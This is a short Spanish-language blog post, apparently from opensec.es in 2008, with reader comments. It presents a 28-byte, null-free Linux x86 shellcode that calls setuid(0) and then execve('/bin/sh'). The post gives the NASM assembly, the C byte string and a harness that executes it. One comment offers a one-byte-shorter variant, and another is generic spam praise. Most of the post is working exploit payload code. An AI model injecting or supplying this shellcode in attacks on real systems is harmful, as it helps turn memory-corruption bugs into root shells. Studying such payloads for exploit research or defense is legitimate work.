Smallest GNU/Linux x86 setuid(0) & exec(“/bin/sh”,0,0) Stable shellcode – 28 bytes
November 26th, 2008
Después de todo lo que hemos hecho, vlan7 me avisó de que las shellcodes anteriores sobre las que habíamos estado trabajando, estaban mal escrita, ya que ambos estábamos metiendo el uid de la llamada setuid en el registro ecx, en lugar de ebx…. Un fallo sin perdón, sin duda.
Así que después de meditarlo bien, retocar la shellcode, probarla en diferentes entornos, modificando la pila, los registros, etc. He llegado a esta shellcode estable de 28 bytes que realiza corréctamente ambas llamadas, setuid & execve:
Código para nasm:
global _start
section .text
_start:
;setuid(0)
xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h
;execve("/bin/sh",0,0)
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0Bh]
mov ebx,esp
int 80h
Código en C:
#include
const char shellcode[]= "\x31\xdb"
"\x8d\x43\x17"
"\x99"
"\xcd\x80"
"\x31\xc9"
"\x51"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x8d\x41\x0b"
"\x89\xe3"
"\xcd\x80";
int main()
{
printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE"
"WITHOUT NULLS THAT SPAWNS A SHELL"
"\n\nCoded by Chema Garcia (aka sch3m4)"
"\n\t + sch3m4@opensec.es"
"\n\t + http://opensec.es"
"\n\n[+] Date: 29/11/2008"
"\n[+] Thanks to: vlan7"
"\n\n[+] Shellcode Size: %d bytes\n\n",
sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}
I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back.
Wouldn’t:
bits 32
global _start
section .text
_start:
xor ebx,ebx
push byte 23
runit:
pop eax
cdq
int 0×80
xor ecx,ecx
push ecx
push 0×68732f6e
push 0×69622f2f
mov ebx,esp
push byte 11
jmp short runit
be one byte shorter?